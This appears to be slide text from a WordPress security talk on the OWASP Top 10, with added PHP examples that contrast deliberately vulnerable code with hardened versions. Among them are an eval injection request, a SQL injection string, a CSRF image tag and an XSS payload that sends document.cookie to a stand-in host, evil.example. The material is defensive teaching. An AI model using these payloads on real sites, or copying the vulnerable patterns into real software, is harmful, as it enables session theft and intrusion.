About me
- Currently:
- Web Developer - UF Health
- WordPress Core Contributor
- Speaker/Teacher/Blogger
- Previously:
- Senior Web Engineer - 10up
- Built Better WP Security (iThemes Security)
- Computer Science Instructor - St. Edward’s University
- Airline Captain/Musician/etc
Who identifies what is important?
The OWASP Top 10
- OWASP = Open Web Application Security Project
- Top 10 web application security risks
- Updated every 3 years (sort of)
- Not specific to language or application (applies to them all)
- https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
The OWASP Top 10
- Deals with
- Code
- Server configuration
- General vulnerabilities
Vulnerability Targets
- Server and application
- User
  - Targets the computer or browser of a user visiting the site
OWASP Vulnerabilities in WordPress
Major WordPress Vulnerabilities
- Sensitive Data Exposure
- Security Misconfiguration
- Injection
- Cross-site Scripting (XSS)
- Insecure Direct Object Reference
- Missing Function Level Access Control
- Cross Site Request Forgery
- Insecure Deserialization
- Using Components with Known Vulnerabilities
Sensitive Data Exposure
- Most common outcome of many attacks
- Failure to properly encrypt (or otherwise protect) sensitive data
Sensitive Data Exposure
- Primary Target
- Potential risk
- Difficulty to exploit
- Outcomes
Security Misconfiguration
- A misconfiguration at any level of the stack (server/application/etc.) that can lead to a compromise
Security Misconfiguration
- Primary Target
- Potential risk
- Difficulty to exploit
- Outcomes: Data corruption, sensitive data exposure
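Added example, not from the talk: a wp-config.php fragment showing the settings that turn up most often in misconfiguration findings, with the weak value next to the hardened one. The constants are real WordPress settings; the values are the usual production recommendations, not anything the slide itself prescribes.

```php
<?php
// Added example (not from the talk): wp-config.php settings commonly flagged as
// misconfigurations. Weak value beside the hardened one; all constants are real
// WordPress settings, the recommended values are the usual production choices.

// Debug output on a live site prints file paths, SQL and stack traces to every
// visitor (sensitive data exposure).
// define( 'WP_DEBUG', true );        // weak: debugging left on in production
define( 'WP_DEBUG', false );          // hardened
define( 'WP_DEBUG_DISPLAY', false );  // never render errors into the page...
define( 'WP_DEBUG_LOG', true );       // ...log to wp-content/debug.log instead. That file is
                                      // inside the web root by default: block it in the
                                      // web server config or pass a path outside the root.

// The built-in theme/plugin file editor turns any compromised admin login into
// PHP code execution on the host.
define( 'DISALLOW_FILE_EDIT', true );

// Where deployments happen outside the dashboard, also block plugin/theme
// installs and updates from wp-admin (no remote code written to disk via the UI).
// define( 'DISALLOW_FILE_MODS', true );

// Admin pages and the login form carry the auth cookies: keep them on TLS.
define( 'FORCE_SSL_ADMIN', true );

// Keys and salts feed every auth cookie and nonce. If the placeholder text is
// still here, both are forgeable. Generate fresh values from
// https://api.wordpress.org/secret-key/1.1/salt/
// define( 'AUTH_KEY', 'put your unique phrase here' );   // weak: placeholder left in place
```

Check a deployed site for these with a quick read of wp-config.php and a request for /wp-content/debug.log; if the log is readable from a browser, the logging fix above only moved the exposure.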
Injection
- Injection vulnerabilities occur when the application sends untrusted data to an interpreter
Injection
- Primary Target
- Potential risk
- Difficulty to exploit
- Outcomes: Data corruption, sensitive data exposure, host pwned
Injection Code Example
$my_variable = 'variable_name';
$x = $_GET['arg'];
eval( "\$my_variable = $x;" );   // $x is interpolated into PHP source text, then executed
// Request:  /index.php?arg=1; phpinfo();
// Executes: $my_variable = 1; phpinfo();;
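The slide's example is code injection through eval(). The injection most often found in WordPress plugins is the same mistake aimed at a different interpreter: request data concatenated into SQL. The following is an added example, not code from the talk; it runs against an in-memory SQLite database under php-cli (assumes the pdo_sqlite extension) so it is self-contained, and the table, rows and attacker input are constructed for the demo. In a plugin the hardened form is $wpdb->prepare().

```php
<?php
// Added example (not from the talk): SQL injection via a string-built query,
// and the parameterised form that defeats it. Uses PDO + SQLite in memory so it
// runs stand-alone; assumes the pdo_sqlite extension is available.

$db = new PDO( 'sqlite::memory:' );
$db->setAttribute( PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION );
$db->exec( 'CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)' );
// Constructed sample rows.
$db->exec( "INSERT INTO wp_users VALUES (1, 'admin', 'hash-of-admin'), (2, 'bob', 'hash-of-bob')" );

// Vulnerable: the request parameter becomes part of the SQL text.
// WordPress equivalent: $wpdb->get_results( "SELECT ... WHERE ID = " . $_GET['id'] )
function lookup_user_vulnerable( PDO $db, string $id ) : array {
    $sql = 'SELECT user_login, user_pass FROM wp_users WHERE ID = ' . $id;
    return $db->query( $sql )->fetchAll( PDO::FETCH_ASSOC );
}

// Hardened: the value travels as a bound parameter and can never change the query shape.
// WordPress equivalent: $wpdb->get_results( $wpdb->prepare( "SELECT ... WHERE ID = %d", $id ) )
// (the (int) cast mirrors what %d does in prepare()).
function lookup_user_safe( PDO $db, string $id ) : array {
    $stmt = $db->prepare( 'SELECT user_login, user_pass FROM wp_users WHERE ID = :id' );
    $stmt->execute( [ ':id' => (int) $id ] );
    return $stmt->fetchAll( PDO::FETCH_ASSOC );
}

$honest  = '2';
$payload = '2 OR 1=1';   // constructed attacker input, e.g. /index.php?id=2%20OR%201=1

echo 'vulnerable, honest input : ', count( lookup_user_vulnerable( $db, $honest ) ), " row(s)\n";
echo 'vulnerable, injected     : ', count( lookup_user_vulnerable( $db, $payload ) ), " row(s), every password hash\n";
echo 'prepared,   injected     : ', count( lookup_user_safe( $db, $payload ) ), " row(s)\n";
```

The WordPress-specific trap is that $wpdb->prepare() only protects values; table and column names, ORDER BY directions and LIMIT clauses still need an allow-list, because %s will quote them into a string literal rather than an identifier.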
Cross-Site Scripting (XSS)
- User-supplied data is sent to the browser without validation or escaping
- Most common vulnerability
Cross-Site Scripting (XSS)
- Primary Target
- Potential risk
- Difficulty to exploit
- Outcomes: Browser hijack, deface website, redirect user, etc.
XSS Code Example
if ( isset( $_GET['my_secret_key'] ) ) {
    echo $_GET['my_secret_key'];   // request data reflected straight into the page: should be esc_html( ... )
}
or
__( 'Some text to translate', 'my-awesome-plugin' );   // translations come from .mo files, so they are input too: echo esc_html__( ... )
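Both snippets on the slide fail the same way: output reaches the browser without being escaped for the context it lands in. The following is an added example, not code from the talk. It runs under php-cli by supplying stand-ins for esc_html(), esc_attr(), esc_url() and esc_html__() (assumptions made so the file is self-contained; a plugin uses the real ones from WordPress core), and the attacker inputs are constructed.

```php
<?php
// Added example (not from the talk). Stand-alone stand-ins for the WordPress
// escaping helpers so this runs under php-cli; in a plugin, use the real
// esc_html(), esc_attr(), esc_url() and esc_html__() from WordPress core.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( string $s ) : string {
        return htmlspecialchars( $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
    function esc_attr( string $s ) : string {
        return htmlspecialchars( $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
    // Minimal esc_url() stand-in: allow only http(s) and neutralise quote/angle
    // characters. WordPress's real esc_url() is more thorough.
    function esc_url( string $s ) : string {
        if ( ! preg_match( '#^https?://#i', $s ) ) {
            return '';
        }
        return str_replace( [ '"', "'", '<', '>' ], [ '%22', '%27', '%3C', '%3E' ], $s );
    }
    function esc_html__( string $text, string $domain ) : string {
        return esc_html( $text );   // the real one translates first, then escapes
    }
}

// Constructed attacker inputs: what $_GET['q'] and $_GET['next'] might carry.
$q    = '<script>location="https://evil.example/?c="+document.cookie</script>';
$next = 'javascript:alert(document.domain)';

// Vulnerable: raw reflection, like `echo $_GET['my_secret_key'];` on the slide.
function render_vulnerable( string $q, string $next ) : string {
    return "<p>Results for: $q</p>\n<a href=\"$next\">continue</a>\n";
}

// Hardened: escape for the context each value lands in (text node, attribute
// value, URL), and escape translated strings too: a .mo file is just another
// input, which is why esc_html__() exists.
function render_safe( string $q, string $next ) : string {
    $html  = '<p>' . esc_html__( 'Results for:', 'my-awesome-plugin' ) . ' ' . esc_html( $q ) . "</p>\n";
    $html .= '<a href="' . esc_url( $next ) . '" title="' . esc_attr( $q ) . "\">continue</a>\n";
    return $html;
}

echo "--- vulnerable ---\n", render_vulnerable( $q, $next );
echo "--- escaped ---\n", render_safe( $q, $next );
```

Note that esc_html() on the href would not have helped: the javascript: scheme contains nothing HTML-special, so only a URL-aware escaper blocks it. Escape late (at output) and pick the function by destination, not by where the data came from.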
Insecure Direct Object Reference
- Use of a key or name to request an object, where the application does not verify the requester's permission to access that object.
Insecure Direct Object Reference
- Primary Target
- Potential risk
- Difficulty to exploit
- Outcomes
Insecure Direct Object Reference Code Example
echo esc_html( $my_wp_user->$_GET['user-key'] );   // output is escaped, but the request chooses WHICH property is read: ?user-key=user_pass
Missing Function Level Access Control
- Failure to verify access rights upon access to a specific function.
Missing Function Level Access Control
- Primary Target
- Potential risk
- Difficulty to exploit
- Outcomes: Data corruption, sensitive data exposure
Missing Function Level Access Control Code Example
if ( is_admin() ) {   // true for ANY request to a /wp-admin/ screen, subscriber included; it is not a role check
    echo $user_list;  // should be gated on current_user_can( 'list_users' )
}
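One added example (not code from the talk) covers the two slides above: the Insecure Direct Object Reference snippet, where the request picks which user field is read, and the Missing Function Level Access Control snippet, where is_admin() is mistaken for an authorization check. The users, their capabilities and the stand-ins for current_user_can() and esc_html() are constructed so the file runs under php-cli (PHP 7.4+ for the arrow functions); a plugin would call the real WordPress functions.

```php
<?php
// Added example (not from the talk): IDOR and missing function-level access
// control side by side, with hardened versions. demo_user_can() stands in for
// current_user_can() and esc_html_stub() for esc_html(); users are constructed.

$users = [
    1 => (object) [ 'ID' => 1, 'user_login' => 'admin', 'user_email' => 'admin@example.com',
                    'user_pass' => 'hash-of-admin', 'caps' => [ 'list_users' ] ],
    2 => (object) [ 'ID' => 2, 'user_login' => 'bob', 'user_email' => 'bob@example.com',
                    'user_pass' => 'hash-of-bob', 'caps' => [] ],
];

function demo_user_can( object $user, string $cap ) : bool {   // stand-in for current_user_can()
    return in_array( $cap, $user->caps, true );
}

function esc_html_stub( string $s ) : string {                 // stand-in for esc_html()
    return htmlspecialchars( $s, ENT_QUOTES, 'UTF-8' );
}

// --- Insecure Direct Object Reference -------------------------------------
// Vulnerable (the slide): the requester names any property, including user_pass.
function show_user_field_vulnerable( object $target, string $key ) : string {
    return esc_html_stub( $target->$key );
}

// Hardened: an allow-list of fields that may be shown at all, plus a check that
// this requester may see this target (the owner, or someone with list_users).
function show_user_field_safe( object $requester, object $target, string $key ) : string {
    $public = [ 'user_login', 'user_email' ];
    if ( ! in_array( $key, $public, true ) ) {
        return 'rejected: unknown field';
    }
    if ( $requester->ID !== $target->ID && ! demo_user_can( $requester, 'list_users' ) ) {
        return 'rejected: not your record';
    }
    return esc_html_stub( $target->$key );
}

// --- Missing function level access control --------------------------------
// Vulnerable (the slide): is_admin() only says the request is for a /wp-admin/
// screen. A subscriber's profile page is such a screen.
function list_users_vulnerable( bool $is_admin_screen, array $users ) : string {
    if ( $is_admin_screen ) {   // is_admin()
        return implode( ', ', array_map( fn( $u ) => $u->user_login, $users ) );
    }
    return '';
}

// Hardened: gate on a capability, whatever screen the request came in on.
function list_users_safe( object $requester, array $users ) : string {
    if ( ! demo_user_can( $requester, 'list_users' ) ) {   // current_user_can( 'list_users' )
        return 'rejected: insufficient capability';        // real code: wp_die( ..., 403 )
    }
    return implode( ', ', array_map( fn( $u ) => $u->user_login, $users ) );
}

$bob = $users[2];
echo "IDOR vulnerable, bob reads admin's user_pass : ", show_user_field_vulnerable( $users[1], 'user_pass' ), "\n";
echo "IDOR safe,       bob reads admin's user_pass : ", show_user_field_safe( $bob, $users[1], 'user_pass' ), "\n";
echo "IDOR safe,       bob reads his own user_email: ", show_user_field_safe( $bob, $bob, 'user_email' ), "\n";
echo "MFLAC vulnerable, bob on a wp-admin screen   : ", list_users_vulnerable( true, $users ), "\n";
echo "MFLAC safe,       bob                        : ", list_users_safe( $bob, $users ), "\n";
echo "MFLAC safe,       admin                      : ", list_users_safe( $users[1], $users ), "\n";
```

The two checks are different questions and both are needed: the capability check answers "may this user call this function at all", the ownership check answers "may this user touch this particular object". Passing the first and skipping the second is exactly how a user with edit_posts ends up editing someone else's post.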
Cross Site Request Forgery (CSRF)
- Forces a logged-on victim's browser to send a forged HTTP request to a vulnerable application.
- The request carries the victim's session cookie and any other automatically attached authentication information, so the application processes it as the victim.
Cross Site Request Forgery (CSRF)
- Primary Target
- Potential risk
- Difficulty to exploit
- Outcomes: Data corruption, sensitive data exposure
CSRF Code Example
<!-- On the attacker's page: the zero-size image makes the victim's browser issue this GET, cookies included -->
<img src="http://mysite.com/password=get_my_password" width="0" height="0" />
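What stops the forged request on the slide is that the attacker's page cannot know a secret tied to the victim's session: in WordPress that secret is the nonce. The following is an added example, not code from the talk. It models the nonce mechanism with stand-ins for wp_create_nonce() and wp_verify_nonce() (same shape, but no 12-hour tick and a fixed secret, both assumptions so it runs under php-cli), and the users and requests are constructed; a plugin uses wp_nonce_field() on the form and check_admin_referer() or wp_verify_nonce() in the handler.

```php
<?php
// Added example (not from the talk): a CSRF-vulnerable password change next to
// the nonce-protected version. demo_create_nonce()/demo_verify_nonce() are
// simplified stand-ins for wp_create_nonce()/wp_verify_nonce(); the real ones
// also mix in a time tick and the session token.

const NONCE_SECRET = 'stand-in-for-NONCE_KEY-and-NONCE_SALT';   // assumption: fixed demo secret

function demo_create_nonce( string $action, int $user_id ) : string {
    return substr( hash_hmac( 'md5', $action . '|' . $user_id, NONCE_SECRET ), -12, 10 );
}

function demo_verify_nonce( string $nonce, string $action, int $user_id ) : bool {
    return hash_equals( demo_create_nonce( $action, $user_id ), $nonce );
}

// The state-changing handler. $request models $_POST (or $_GET), $user_id the
// account the browser's session cookie identifies, $users the user table.
function change_password_vulnerable( array $request, int $user_id, array &$users ) : string {
    $users[ $user_id ]['pass'] = $request['password'];
    return 'changed';
}

function change_password_safe( array $request, int $user_id, array &$users ) : string {
    if ( empty( $request['_wpnonce'] )
         || ! demo_verify_nonce( $request['_wpnonce'], 'change_password_' . $user_id, $user_id ) ) {
        return 'rejected: missing or bad nonce';   // real code: check_admin_referer() calls wp_die()
    }
    $users[ $user_id ]['pass'] = $request['password'];
    return 'changed';
}

$users  = [ 7 => [ 'login' => 'victim', 'pass' => 'original' ] ];   // constructed
$victim = 7;   // the forged request arrives with the victim's cookie, so this is who it runs as

// Forged request: the attacker knows the URL and field names but not the nonce
// rendered into the page the victim would have to load first.
$forged = [ 'password' => 'attacker-chosen' ];
echo 'vulnerable, forged: ', change_password_vulnerable( $forged, $victim, $users ), ' -> ', $users[7]['pass'], "\n";

$users[7]['pass'] = 'original';
echo 'safe, forged      : ', change_password_safe( $forged, $victim, $users ), ' -> ', $users[7]['pass'], "\n";

// Legitimate request: the form the victim submitted included wp_nonce_field(),
// so the token for this user and action is present.
$legit = [
    'password' => 'new-by-owner',
    '_wpnonce' => demo_create_nonce( 'change_password_' . $victim, $victim ),
];
echo 'safe, legitimate  : ', change_password_safe( $legit, $victim, $users ), ' -> ', $users[7]['pass'], "\n";
```

Two caveats a practitioner will want. First, refusing GET for state changes kills the img-tag vector on the slide, but a hidden auto-submitting form can POST cross-site just as easily, so the nonce is still required. Second, a nonce is not authorization: the handler above still needs the current_user_can() check from the previous slide, because a valid nonce only proves the request came from a page WordPress rendered for that user.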
Insecure Deserialization
- Insecure Deserialization is a vulnerability which occurs when untrusted data is used to abuse the logic of an application, inflict a denial of service (DoS) attack, or even execute arbitrary code upon it being deserialized.
Insecure Deserialization
- Primary Target
- Potential risk
- Difficulty to exploit
- Outcomes: Data corruption, sensitive data exposure, host pwned
Insecure Deserialization Example
unserialize( $_POST['data'] );   // instantiates whatever class the request names; any loaded class with __wakeup()/__destruct() becomes attacker-driven
Using Components with Known Vulnerabilities
- Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
Using Components with Known Vulnerabilities
- Primary Target: User, application and server
- Potential risk
- Difficulty to exploit
- Outcomes: Data corruption, sensitive data exposure, host pwned
General Protection Strategies
Review Your WordPress Dashboard Regularly
Making Coding Standards Easier
Important WordPress Security Tools
Have (and Verify) a Backup